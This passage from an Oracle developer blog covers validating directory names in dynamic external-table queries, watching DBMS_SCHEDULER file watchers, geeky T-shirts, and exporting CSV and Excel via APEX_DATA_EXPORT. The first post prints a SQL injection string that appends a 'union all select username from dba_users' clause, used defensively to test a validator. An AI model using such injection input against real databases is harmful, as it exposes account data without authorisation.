    v_file varchar2(120) := 'debs_lemon_drizzle_cake.txt';
    v_stmnt clob := q'[select text from nom_nom_xt external modify( default directory recipies_dir location (:b1))]';
    v_rc sys_refcursor;
    v_text varchar2(4000);
    
    v_curid number;
    v_rtn number;
begin
    v_curid := dbms_sql.open_cursor;
    dbms_sql.parse(v_curid, v_stmnt, dbms_sql.native);
    
    dbms_sql.bind_variable(v_curid, 'b1', v_file);
    
    v_rtn := dbms_sql.execute(v_curid);
    
    v_rc := dbms_sql.to_refcursor(v_curid);
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line( v_text);
    end loop;
    close v_rc;
end;
/

225g unsalted butter
225g caster sugar
4 free-range eggs
225g self-raising flour
1 unwaxed lemon
85g icing sugar


PL/SQL procedure successfully completed.

However, Oracle remains rather recalcitrant when you try doing the same with the default directory.

RTFM RTOB ( Read the Oracle Base article) !

After a number of “glugs” from a bottle of something rather expensive whilst trawling through the Oracle Documentation for some clues, I happened to look at the Oracle Base article on this topic which notes that you cannot use bind variables when specifying the Default Directory.

One possible workaround would be to create one external table for each directory that you want to look at.

Alternatively, we can sanitize the incoming value for the DEFAULT DIRECTORY before we drop it into our query.

To this end, DBMS_ASSERT is not going to be much help.
The SQL_OBJECT_NAME function does not recognize Directory Objects…

select dbms_assert.sql_object_name('recipies_dir') from dual;

ORA-44002: invalid object name

… and the SIMPLE_SQL_NAME function will allow pretty much anything if it’s quoted…

select dbms_assert.simple_sql_name(
q'["recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"]')
from dual;

DBMS_ASSERT.SIMPLE_SQL_NAME(Q'["RECIPIES_DIRLOCATION('MIKES_BEANS_ON_TOAST.TXT'))UNIONALLSELECTUSERNAMEFROMDBA_USERS--"]')
---------------------------------------------------------------------------
"recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"

Time then, to unplug the microwave and cook up something home-made…

I’m running on 19c so I know that :

Additionally, I’m going to assume that we’re following Oracle’s recommendation that quoted identifiers are not used for database object names (including Directories). You can find that pearl of wisdom in the page linked above.

Finally, I want to make sure that a user only accesses a valid directory object on which they have appropriate permissions.

Something like this should get us most of the way :

set serverout on
clear screen
declare
    v_dir varchar2(4000) := 'recipies_dir';
    v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
    v_stmnt clob := 
        'select text from nom_nom_xt external modify( default directory <dir> location (:v_file))';
    v_rc sys_refcursor;
    v_text varchar2(4000);
    v_rtn number;
    
    v_placeholder pls_integer;
    v_found_dir boolean;
    cursor c_valid_dir is
        select null
        from all_directories 
        where directory_name = upper(v_dir);
begin
    if length( v_dir) > 128 then
        raise_application_error(-20101, 'Directory Identifier is too long');
    end if;
    -- Assume allowable characters are alphanumeric and underscore. Reject if it contains anything else
    if regexp_instr(replace(v_dir, '_'), '[[:punct:]]|[[:space:]]') > 0 then
        raise_application_error(-20110, 'Directory Name contains wacky characters');
    end if;    
    open c_valid_dir;
    fetch c_valid_dir into v_placeholder;
    v_found_dir := c_valid_dir%found;
    close c_valid_dir;
    if v_found_dir = false then
        raise_application_error(-20120, 'Directory not found');
    end if;    
    v_stmnt := replace(v_stmnt, '<dir>', v_dir);
    open v_rc for v_stmnt using v_file;
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line( v_text);
        
    end loop;
    close v_rc;
end;
/

We can now convert this into an Invoker’s rights package, that should restrict access to directories visible by the calling user :

create or replace package peckish
    authid current_user
as
    type t_nom is table of varchar2(4000);
    
    procedure validate_directory(i_dir in varchar2);

    function recipe( i_dir in varchar2, i_file in varchar2)
        return t_nom pipelined;
        
end peckish;        
/

create or replace package body peckish as

    procedure validate_directory( i_dir in varchar2)
    is
        v_placeholder pls_integer;
        v_found_dir boolean;
        cursor c_valid_dir is
            select null
            from all_directories 
            where directory_name = upper(i_dir);
    begin
        if length( i_dir) > 128 then
            raise_application_error(-20101, 'Directory Identifier is too long');
        end if;
    
        if regexp_instr(replace(i_dir, '_'), '[[:punct:]]|[[:space:]]') > 0 then
            raise_application_error(-20110, 'Directory Name contains wacky characters');
        end if;    
        open c_valid_dir;
        fetch c_valid_dir into v_placeholder;
        v_found_dir := c_valid_dir%found;
        close c_valid_dir;
        if v_found_dir = false then
            raise_application_error(-20120, 'Directory not found');
        end if;    
    end validate_directory;
    
    function recipe( i_dir in varchar2, i_file in varchar2)
        return t_nom pipelined
    is
        v_nom nom_nom_xt%rowtype;
        v_stmnt clob := 
            'select line, text from nom_nom_xt external modify( default directory <dir> location (:v_file))';
        v_rc sys_refcursor;
        v_text varchar2(4000);
       
    begin
        validate_directory(i_dir);
        v_stmnt := replace(v_stmnt, '<dir>', i_dir);            
        open v_rc for v_stmnt using i_file;
        loop
            fetch v_rc into v_nom.line, v_nom.text;
            exit when v_rc%notfound;
            pipe row( v_nom);
        end loop;
        close v_rc;
    end recipe;
end peckish;
/

Let’s run some tests :

select line as line_no, text as ingredient 
from table(peckish.recipe('recipies_dir', 'debs_lemon_drizzle_cake.txt'))
/


LINE_NO INGREDIENT
---------- ----------------------------------------
1 225g unsalted butter
2 225g caster sugar
3 4 free-range eggs
4 225g self-raising flour
5 1 unwaxed lemon
6 85g icing sugar

6 rows selected.

select text as ingredient
from table (
peckish.recipe(
'this_is_a_very_long_identifier_to_check_that_the_length_restriction_works_as_expected._Is_that_128_characters_yet_?_Apparently_not_Oh_well_lets_keep_going_for_a_bit',
'mikes_beans_on_toast.txt'
))
/

ORA-20101: Directory Identifier is too long



select text as ingredient
from table(
peckish.recipe
(
q'["recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"]',
'debs_lemon_drizzle_cake.txt'
))
/

ORA-20110: Directory Name contains wacky characters


select text as ingredient
from table (peckish.recipe('super_secret_dir', 'mikes_beans_on_toast.txt'))
/

ORA-20120: Directory not found

All of which has left me feeling rather in the mood for a snack. I wonder if there’s any of that cake left ?

Freddie Starr Ate My File ! Finding out exactly what the Oracle Filewatcher is up to

Mon, 2024-04-15 01:30

As useful as they undoubtedly are, any use of a DBMS_SCHEDULER File Watchers in Oracle is likely to involve a number of moving parts.
This can make trying to track down issues feel a bit like being on a hamster wheel.
Fortunately, you can easily find out just exactly what the filewatcher is up to, if you know where to look …

I’ve got a procedure to populate a table with details of any arriving file.

create table incoming_files(
    destination VARCHAR2(4000),
    directory_path VARCHAR2(4000),
    actual_file_name VARCHAR2(4000),
    file_size NUMBER,
    file_timestamp TIMESTAMP WITH TIME ZONE)
/    

create or replace procedure save_incoming_file( i_result sys.scheduler_filewatcher_result)
as
begin
    insert into incoming_files( 
        destination, 
        directory_path, 
        actual_file_name, 
        file_size, 
        file_timestamp)
    values(
        i_result.destination,
        i_result.directory_path,
        i_result.actual_file_name,
        i_result.file_size,
        i_result.file_timestamp);
end;
/

The filewatcher and associated objects that will invoke this procedure are :

begin
    dbms_credential.create_credential
    (
        credential_name => 'starr',
        username => 'fstarr',
        password => 'some-complex-password'
    );
end;
/

begin
    dbms_scheduler.create_file_watcher(
        file_watcher_name => 'freddie',
        directory_path => '/u01/app/upload_files',
        file_name => '*.txt',
        credential_name => 'starr',
        enabled => false,
        comments => 'Feeling peckish');
end;
/



begin
    dbms_scheduler.create_program(
        program_name => 'snack_prog',
        program_type => 'stored_procedure',
        program_action => 'save_incoming_file',
        number_of_arguments => 1,
        enabled => false);
         
    -- need to make sure this program can see the message sent by the filewatcher...
    dbms_scheduler.define_metadata_argument(
        program_name => 'snack_prog',
        metadata_attribute => 'event_message',
        argument_position => 1);
         
    -- Create a job that links the filewatcher to the program...
    dbms_scheduler.create_job(
        job_name => 'snack_job',
        program_name => 'snack_prog',
        event_condition => null,
        queue_spec => 'freddie',
        auto_drop => false,
        enabled => false);
end;
/

The relevant components have been enabled :

begin
    dbms_scheduler.enable('freddie');
    dbms_scheduler.enable('snack_prog');
    dbms_scheduler.enable('snack_job');
end;
/

… and – connected on the os as fstarr – I’ve dropped a file into the directory…

echo 'Squeak!' >/u01/app/upload_files/hamster.txt
Watching the (File)Watcher

File watchers are initiated by a scheduled run of the SYS FILE_WATCHER job.

The logging_level value determines whether or not the executions of this job will be available in the *_SCHEDULER_JOB_RUN_DETAILS views.

select program_name, schedule_name, 
    job_class, logging_level
from dba_scheduler_jobs
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
/
PROGRAM_NAME         SCHEDULE_NAME             JOB_CLASS                           LOGGING_LEVEL  
-------------------- ------------------------- ----------------------------------- ---------------
FILE_WATCHER_PROGRAM FILE_WATCHER_SCHEDULE     SCHED$_LOG_ON_ERRORS_CLASS          FULL           

If the logging_level is set to OFF (which appears to be the default in 19c), you can enable it by connecting as SYSDBA and running :

begin
    dbms_scheduler.set_attribute('FILE_WATCHER', 'logging_level', dbms_scheduler.logging_full);
end;
/

The job is assigned the FILE_WATCHER_SCHEDULE, which runs every 10 minutes by default. To check the current settings :

select repeat_interval
from dba_scheduler_schedules
where schedule_name = 'FILE_WATCHER_SCHEDULE'
/

REPEAT_INTERVAL               
------------------------------
FREQ=MINUTELY;INTERVAL=10

The thing is, there are times when the SYS.FILE_WATCHER seems to slope off for a tea-break. So, if you’re wondering why your file has not been processed yet, it’s handy to be able to check if this job has run when you expected it to.

In this case, as logging is enabled, we can do just that :

select log_id, log_date, instance_id, req_start_date, actual_start_date
from dba_scheduler_job_run_details
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
and log_date >= sysdate - (1/24)
order by log_date desc
/
LOG_ID  LOG_DATE                            INSTANCE_ID REQ_START_DATE                             ACTUAL_START_DATE                         
------- ----------------------------------- ----------- ------------------------------------------ ------------------------------------------
1282    13-APR-24 14.50.47.326358000 +01:00           1 13-APR-24 14.50.47.000000000 EUROPE/LONDON 13-APR-24 14.50.47.091753000 EUROPE/LONDON
1274    13-APR-24 14.40.47.512172000 +01:00           1 13-APR-24 14.40.47.000000000 EUROPE/LONDON 13-APR-24 14.40.47.075846000 EUROPE/LONDON
1260    13-APR-24 14.30.47.301176000 +01:00           1 13-APR-24 14.30.47.000000000 EUROPE/LONDON 13-APR-24 14.30.47.048977000 EUROPE/LONDON
1248    13-APR-24 14.20.47.941210000 +01:00           1 13-APR-24 14.20.47.000000000 EUROPE/LONDON 13-APR-24 14.20.47.127769000 EUROPE/LONDON
1212    13-APR-24 14.10.48.480193000 +01:00           1 13-APR-24 14.10.47.000000000 EUROPE/LONDON 13-APR-24 14.10.47.153032000 EUROPE/LONDON
1172    13-APR-24 14.00.50.676270000 +01:00           1 13-APR-24 14.00.47.000000000 EUROPE/LONDON 13-APR-24 14.00.47.111936000 EUROPE/LONDON

6 rows selected. 

Even if the SYS.FILE_WATCHER is not logging, when it does run, any files being watched for are added to a queue, the contents of which can be found in SCHEDULER_FILEWATCHER_QT.
This query will get you the really useful details of what your filewatcher has been up to :

select 
    t.step_no,
    treat( t.user_data as sys.scheduler_filewatcher_result).actual_file_name as filename,
    treat( t.user_data as sys.scheduler_filewatcher_result).file_size as file_size,
    treat( t.user_data as sys.scheduler_filewatcher_result).file_timestamp as file_ts,
    t.enq_time,
    x.name as filewatcher,
    x.requested_file_name as search_pattern,
    x.credential_name as credential_name
from sys.scheduler_filewatcher_qt t,
    table(t.user_data.matching_requests) x
where enq_time > trunc(sysdate)
order by enq_time
/

  STEP_NO FILENAME         FILE_SIZE FILE_TS                          ENQ_TIME                     FILEWATCHER     SEARCH_PATTERN  CREDENTIAL_NAME
---------- --------------- ---------- -------------------------------- ---------------------------- --------------- --------------- ---------------
         0 hamster.txt              8 13-APR-24 12.06.58.000000000 GMT 13-APR-24 12.21.31.746338000 FREDDIE         *.txt           STARR          

Happily, in this case, our furry friend has avoided the Grim Squaker…

NOTE – No hamsters were harmed in the writing of this post.

If you think I’m geeky, you should meet my friend.

Sat, 2024-03-16 11:14

I’d like to talk about a very good friend of mine.
Whilst he’s much older than me ( 11 or 12 weeks at least), we do happen to share interests common to programmers of a certain vintage.

About a year ago, he became rather unwell.
Since then, whenever I’ve gone to visit, I’ve taken care to wear something that’s particular to our friendship and/or appropriately geeky.

At one point, when things were looking particularly dicey, I promised him, that whilst “Captain Scarlet” was already taken, if he came through he could pick any other colour he liked.
As a life-long Luton Town fan, his choice was somewhat inevitable.
So then, what follows – through the medium of Geeky T-shirts – is a portrait of my mate Simon The Indestructable Captain Orange…

When we first met, Windows 3.1 was still on everyone’s desktop and somewhat prone to hanging at inopportune moments. Therefore, we are fully aware of both the origins and continuing relevance of this particular pearl of wisdom :

Fortunately, none of the machines Simon was wired up to in the hospital seemed to be running any version of Windows so I thought he’d be reassured by this :

Whilst our first meeting did not take place on a World riding through space on the back of a Giant Turtle ( it was in fact, in Milton Keynes), Simon did earn my eternal gratitude by recommending the book Good Omens – which proved to be my gateway to Discworld.
The relevance of this next item of “Geek Chic” is that, when Simon later set up his own company, he decided that it should have a Latin motto.
In this, he was inspired by the crest of the Ankh-Morpork Assassins’ Guild :

His motto :

Nil codex sine Lucre

…which translates as …

No code without payment

From mottoes to something more akin to a mystic incantation, chanted whenever you’re faced with a seemingly intractable technical issue. Also, Simon likes this design so…

As we both know, there are 10 types of people – those who understand binary and those who don’t…

When confronted by something like this, I am able to recognise that the binary numbers are ASCII codes representing alphanumeric characters. However, I’ve got nothing on Simon, a one-time Assembler Programmer.
Whilst I’m mentally removing my shoes and socks in preparation to translate the message, desperately trying to remember the golden rule of binary maths ( don’t forget to carry the 1), he’ll just come straight out with the answer (“Geek”, in this case).

Saving the geekiest to last, I’m planning to dazzle with this on my next visit :

Techie nostalgia and a Star Wars reference all on the one t-shirt. I don’t think I can top that. Well, not for now anyway.

Using the APEX_DATA_EXPORT package directly from PL/SQL

Mon, 2024-01-29 01:30

As Data Warehouse developers, there is frequently a need for us to produce user reports in a variety of formats (ok, Excel).
Often these reports are the output of processes running as part of an unattended batch.
In the past I’ve written about some of the solutions out there for creating csv files and, of course Excel.

The good news is that, since APEX 20.2, Oracle provides the ability to do this out-of-the-box by means of the APEX_DATA_EXPORT PL/SQL package.
The catch is that you need to have an active APEX session to call it.
Which means you need to have an APEX application handy.

Fortunately, it is possible to initiate an APEX session and call this package without going anywhere near the APEX UI itself, as you’ll see shortly.

Specfically what we’ll cover is :

  • generating comma-separated (CSV) output
  • generating an XLSX file
  • using the ADD_AGGREGATE procedure to add a summary
  • using the ADD_HIGHLIGHT procedure to apply conditional formatting
  • using the GET_PRINT_CONFIG function to apply document-wide styling

Additionally, we’ll explore how to create a suitable APEX Application from a script if one is not already available.

Incidentally, the scripts in this post can be found in this Github Repo.

Before I go any further, I should acknowledge the work of Amirreza Rastandeh, who’s LinkedIn article inspired this post.

A quick word on the Environment I used in these examples – it’s an Oracle supplied VirtualBox appliance running Oracle 23c Free Database and APEX 22.2.

Generating CSV output

APEX_DATA_EXPORT offers a veritable cornucopia of output formats. However, to begin with, let’s keep things simple and just generate a CSV into a CLOB object so that we can check the contents directly from within a script.

We will need to call APEX_SESSION.CREATE_SESSION and pass it some details of an Apex application in order for this to work so the first thing we need to do is to see if we have such an application available :

select workspace, application_id, page_id, page_name
from apex_application_pages
order by page_id
/

WORKSPACE APPLICATION_ID PAGE_ID PAGE_NAME
------------------------------ -------------- ---------- --------------------
HR_REPORT_FILES 105 0 Global Page
HR_REPORT_FILES 105 1 Home
HR_REPORT_FILES 105 9999 Login Page

As long as we get at least one row back from this query, we’re good to go. Now for the script itself (called csv_direct.sql) :

set serverout on size unlimited
clear screen

declare

    cursor c_apex_app is
        select ws.workspace_id, ws.workspace, app.application_id, app.page_id
        from apex_application_pages app
        inner join apex_workspaces ws
            on ws.workspace = app.workspace
        order by page_id;    

    v_apex_app c_apex_app%rowtype;    
   
    v_stmnt varchar2(32000);
    v_context apex_exec.t_context;
    v_export apex_data_export.t_export;
begin

    dbms_output.put_line('Getting app details...');
    -- We only need the first record returned by this cursor 
    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);
    
    dbms_output.put_line('Creating session');

    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'anynameyoulike' -- this parameter is mandatory but can be any string apparently
    );
    
    v_stmnt := 'select * from departments';

    dbms_output.put_line('Opening context');
    
    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    
    
    dbms_output.put_line('Running Report');
    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => 'CSV', -- patience ! We'll get to the Excel shortly.
        p_as_clob => true -- by default the output is saved as a blob. This overrides to save as a clob
    );
    
    apex_exec.close( v_context);

    dbms_output.put_line(v_export.content_clob);
end;
/
        

Running this we get :

Getting app details...
Creating session
Opening context
Running Report
DEPARTMENT_ID,DEPARTMENT_NAME,MANAGER_ID,LOCATION_ID
10,Administration,200,1700
20,Marketing,201,1800
30,Purchasing,114,1700
40,Human Resources,203,2400
50,Shipping,121,1500
60,IT,103,1400
70,Public Relations,204,2700
80,Sales,145,2500
90,Executive,100,1700
100,Finance,108,1700
110,Accounting,205,1700
120,Treasury,,1700
130,Corporate Tax,,1700
140,Control And Credit,,1700
150,Shareholder Services,,1700
160,Benefits,,1700
170,Manufacturing,,1700
180,Construction,,1700
190,Contracting,,1700
200,Operations,,1700
210,IT Support,,1700
220,NOC,,1700
230,IT Helpdesk,,1700
240,Government Sales,,1700
250,Retail Sales,,1700
260,Recruiting,,1700
270,Payroll,,1700



PL/SQL procedure successfully completed.

We can get away with using DBMS_OUTPUT as the result set is comparatively small. Under normal circumstances, you’ll probably want to save it into a table ( as in Amirreza’s post), or write it out to a file.

In fact, writing to a file is exactly what we’ll be doing with the Excel output we’ll generate shortly.

First though, what if you don’t have a suitable APEX application lying around…

Creating an APEX application from SQL

NOTE – you only need to do this if you do not already have a suitable APEX Application available.
If you do then feel free to skip to the next bit, where we finally start generating XLSX files !

First, we need to check to see if there is an APEX workspace present for us to create the Application in :

select workspace, workspace_id
from apex_workspaces;

If this returns any rows then you should be OK to pick one of the workspaces listed and create your application in that.

Otherwise, you can create a Workspace by connecting to the database as a user with the APEX_ADMINISTRATOR_ROLE and running :

exec apex_instance_admin.add_workspace( p_workspace => 'HR_REPORT_FILES', p_primary_schema => 'HR');

…where HR_REPORT_FILES is the name of the workspace you want to create and HR is a schema that has access to the database objects you want to run your reports against.

Next, following Jeffrey Kemp’s sage advice ,

I can just create and then export an Application on any compatible APEX instance and then simply import the resulting file.
That’s right, it’ll work irrespective of the environment on which the export file is created, as long as it’s a compatible APEX version.
If you need them, the instructions for exporting an APEX application are here.

I’ve just clicked through the Create Application Wizard to produce an empty application using the HR schema and have then exported it to a file called apex22_hr_report_files_app.sql.

To import it, I ran the following script:

begin

apex_application_install.set_workspace('HR_REPORT_FILES');
apex_application_install.generate_application_id;
apex_application_install.generate_offset;
end;
/

@/home/mike/Downloads/apex22_hr_report_files_app.sql

Once it’s run we can confirm that the import was successful :

select application_id, application_name,
page_id, page_name
from apex_application_pages
where workspace = 'HR_REPORT_FILES'
/

APPLICATION_ID APPLICATION_NAME PAGE_ID PAGE_NAME
-------------- -------------------- ---------- --------------------
105 Lazy Reports 0 Global Page
105 Lazy Reports 1 Home
105 Lazy Reports 9999 Login Page

The add_workspace.sql script in the Github Repo executes both the create workspace and application import steps described here.

Right, where were we…

Generating and Excel file

First we’ll need a directory object so we can write our Excel file out to disk. So, as a suitably privileged user :

create or replace directory hr_reports as '/opt/oracle/hr_reports';

grant read, write on directory hr_reports to hr;

OK – now to generate our report as an Excel…

set serverout on size unlimited
clear screen

declare

    cursor c_apex_app is
    select ws.workspace_id, ws.workspace, app.application_id, app.page_id
    from apex_application_pages app
    inner join apex_workspaces ws
        on ws.workspace = app.workspace
    order by page_id;    

    v_apex_app c_apex_app%rowtype;    

    v_stmnt varchar2(32000);
    v_context apex_exec.t_context;
    
    v_export apex_data_export.t_export;
    
    -- File handling variables
    v_dir all_directories.directory_name%type := 'HR_REPORTS';
    v_fname varchar2(128) := 'hr_departments_reports.xlsx';

    v_fh utl_file.file_type;
    v_buffer raw(32767);
    v_amount integer := 32767;
    v_pos integer := 1;
    v_length integer;
    
begin

    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);

    
    v_stmnt := 'select * from departments';

    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'whatever' -- any string will do !
    );
    
   -- Create the query context...
    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    

    -- ...and export the data into the v_export object
    -- this time use the default - i.e. export to a BLOB, rather than a CLOB
    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => apex_data_export.c_format_xlsx -- XLSX
    );
    
    apex_exec.close( v_context);
    
    dbms_output.put_line('Writing file');

    -- Now write the blob out to an xlsx file

    v_length := dbms_lob.getlength( v_export.content_blob);
    v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
        
    while v_pos <= v_length loop
        dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
        utl_file.put_raw(v_fh, v_buffer, true);
        v_pos := v_pos + v_amount;
    end loop;
        
    utl_file.fclose( v_fh);
    dbms_output.put_line('File written to HR_REPORTS');

exception when others then
    dbms_output.put_line(sqlerrm);
    if utl_file.is_open( v_fh) then
        utl_file.fclose(v_fh);
    end if;    
end;
/

As you can see, this script is quite similar to the csv version. The main differences are that, firstly, we’re saving the output as a BLOB rather than a CLOB, simply by not overriding the default behaviour when calling APEX_DATA_EXPORT.EXPORT.

Secondly, we’re writing the result out to a file.

Once we retrieve the file and open it, we can see that indeed, it is in xlsx format :

As well as generating a vanilla spreadsheet, APEX_DATA_EXPORT does have a few more tricks up it’s sleeve…

Adding an Aggregation

We can add a row count to the bottom of our report by means of the ADD_AGGREGATE procedure.
To do so, we need to modify the report query to produce the data to be used by the aggregate :

select department_id, department_name, manager_id, location_id,  
    count( 1) over() as record_count 
 from departments';

As we don’t want to list the record count on every row, we need to exclude the record_count column from the result set by specifying the columns that we do actually want in the output. We can do this with calls to the ADD_COLUMN procedure :

    apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_ID');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_NAME');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'MANAGER_ID');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'LOCATION_ID');

NOTE – column names passed in the P_NAME parameter in this procedure need to be in UPPERCASE.

Finally, we need to specify an aggregate itself using the ADD_AGGREGATE procedure :

    apex_data_export.add_aggregate
    (
        p_aggregates => v_aggregates,
        p_label => 'Data Row Count',
        p_display_column => 'DEPARTMENT_ID',
        p_value_column => 'RECORD_COUNT'
    );    

The finished script is called excel_aggregate.sql :

set serverout on size unlimited
clear screen

declare

    cursor c_apex_app is
        select ws.workspace_id, ws.workspace, app.application_id, app.page_id
        from apex_application_pages app
        inner join apex_workspaces ws
            on ws.workspace = app.workspace
        order by page_id;    

    v_apex_app c_apex_app%rowtype;    
   
    v_stmnt varchar2(32000);
    
    v_columns apex_data_export.t_columns;
    v_aggregates  apex_data_export.t_aggregates;
    
    v_context apex_exec.t_context;
    v_export apex_data_export.t_export;
    
    -- File handling variables
    v_dir all_directories.directory_name%type := 'HR_REPORTS';
    v_fname varchar2(128) := 'aggregate.xlsx';

    v_fh utl_file.file_type;
    v_buffer raw(32767);
    v_amount integer := 32767;
    v_pos integer := 1;
    v_length integer;
    
begin

    -- We only need the first record returned by this cursor 
    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);
    
    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'anynameyoulike' 
    );
    
    
    -- Add a row with a count of the records in the file
    -- We need to add the relevant data to the query and then format it
    v_stmnt := 
        'select department_id, department_name, manager_id, location_id,  
            count( 1) over() as record_count 
         from departments';

    -- Make sure only the data columns to display on the report, not the record_count
    -- NOTE - in all of these procs, column names need to be passed as upper case literals
    apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_ID');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_NAME');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'MANAGER_ID');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'LOCATION_ID');
    
    apex_data_export.add_aggregate
    (
        p_aggregates => v_aggregates,
        p_label => 'Data Row Count',
        p_display_column => 'DEPARTMENT_ID',
        p_value_column => 'RECORD_COUNT'
    );    

    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    

    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => apex_data_export.c_format_xlsx, -- XLSX
        p_columns => v_columns,
        p_aggregates => v_aggregates
    );
    
    apex_exec.close( v_context);
    
    v_length := dbms_lob.getlength( v_export.content_blob);
    v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
    
    while v_pos <= v_length loop
        dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
        utl_file.put_raw(v_fh, v_buffer, true);
        v_pos := v_pos + v_amount;
    end loop;
        
    utl_file.fclose( v_fh);

    dbms_output.put_line('File written to HR_REPORTS');
    
exception when others then
    dbms_output.put_line(sqlerrm);
    if utl_file.is_open( v_fh) then
        utl_file.fclose(v_fh);
    end if;    
end;
/
       

When we run this, we now get a row count row at the bottom of the file :

Highlighting cells and rows

The ADD_HIGHLIGHT procedure allows us to apply conditional formatting to individual cells, or even entire rows.
Once again the values to determine this behaviour need to be included in the report query.
In this case, we specify a highlight_id value to be used in rendering the row.

This time, I have a new query and I want to apply formatting based on the value of the SALARY column.
If the value is below 6000 then I want to make the text red ( by applying highlighter_id 1).
Otherwise, I want to set the background colour to green for the entire row ( highlighter_id 2).
The query therefore is this :

select first_name, last_name, salary,
    case when salary < 6000 then 1 else 2 end as fair_pay
from employees
where job_id = 'IT_PROG'

Highlight 1 is :

    -- text in red for id 1
    apex_data_export.add_highlight(
        p_highlights => v_highlights,
        p_id => 1,
        p_value_column => 'FAIR_PAY',
        p_display_column => 'SALARY',
        p_text_color => '#FF0000' );    

…and highlight 2 is :

    -- Whole row with green background for id 2
    apex_data_export.add_highlight
    (
        p_highlights => v_highlights,
        p_id => 2,
        p_value_column => 'FAIR_PAY',
        p_text_color => '#000000', -- black
        p_background_color => '#00ffbf' -- green
    );

The finished script is excel_highlight.sql :

set serverout on size unlimited
clear screen

declare

    cursor c_apex_app is
        select ws.workspace_id, ws.workspace, app.application_id, app.page_id
        from apex_application_pages app
        inner join apex_workspaces ws
            on ws.workspace = app.workspace
        order by page_id;    

    v_apex_app c_apex_app%rowtype;    
   
    v_stmnt varchar2(32000);
    
    v_highlights apex_data_export.t_highlights;    
    
    v_context apex_exec.t_context;
    v_export apex_data_export.t_export;
    
    v_dir all_directories.directory_name%type := 'HR_REPORTS';
    v_fname varchar2(128) := 'programmer_pay.xlsx';

    v_fh utl_file.file_type;
    v_buffer raw(32767);
    v_amount integer := 32767;
    v_pos integer := 1;
    v_length integer;
    
begin

    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);
    
    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'anynameyoulike' 
    );
    
    
    -- Add a row with a count of the records in the file
    -- We need to add the relevant data to the query and then format it
    v_stmnt := 
        q'[select first_name, last_name, salary,
            case when salary < 6000 then 1 else 2 end as fair_pay
        from employees
        where job_id = 'IT_PROG']';

    -- text in red for id 1
    apex_data_export.add_highlight(
        p_highlights => v_highlights,
        p_id => 1,
        p_value_column => 'FAIR_PAY',
        p_display_column => 'SALARY',
        p_text_color => '#FF0000' );    
    
    -- Whole row with green background for id 2
    apex_data_export.add_highlight
    (
        p_highlights => v_highlights,
        p_id => 2,
        p_value_column => 'FAIR_PAY',
        p_text_color => '#000000', -- black
        p_background_color => '#00ffbf' -- green
    );
    
    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    


    -- Pass the highlights object into the export
    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => apex_data_export.c_format_xlsx,
        p_highlights => v_highlights 
    );
    
    apex_exec.close( v_context);
    
    v_length := dbms_lob.getlength( v_export.content_blob);
    v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
    
    while v_pos <= v_length loop
        dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
        utl_file.put_raw(v_fh, v_buffer, true);
        v_pos := v_pos + v_amount;
    end loop;
        
    utl_file.fclose( v_fh);
    dbms_output.put_line('File written to HR_REPORTS');

exception when others then
    dbms_output.put_line(sqlerrm);
    if utl_file.is_open( v_fh) then
        utl_file.fclose(v_fh);
    end if;    
end;
/

…and the output…

Formatting with GET_PRINT_CONFIG

The GET_PRINT_CONFIG function offers a plethora of document formatting options…and a chance for me to demonstrate that I’m really more of a back-end dev.

To demonstrate just some of the available options, I have :

  • changed the header and body font family to Times (default is Helvetica)
  • set the heading text to be White and bold
  • set the header background to be Dark Gray ( or Grey, if you prefer)
  • set the body background to be Turquoise
  • set the body font colour to be Midnight Blue

All of which looks like this :

v_print_config := apex_data_export.get_print_config
(
    p_header_font_family => apex_data_export.c_font_family_times, -- Default is "Helvetica"
    p_header_font_weight => apex_data_export.c_font_weight_bold, --  Default is "normal"
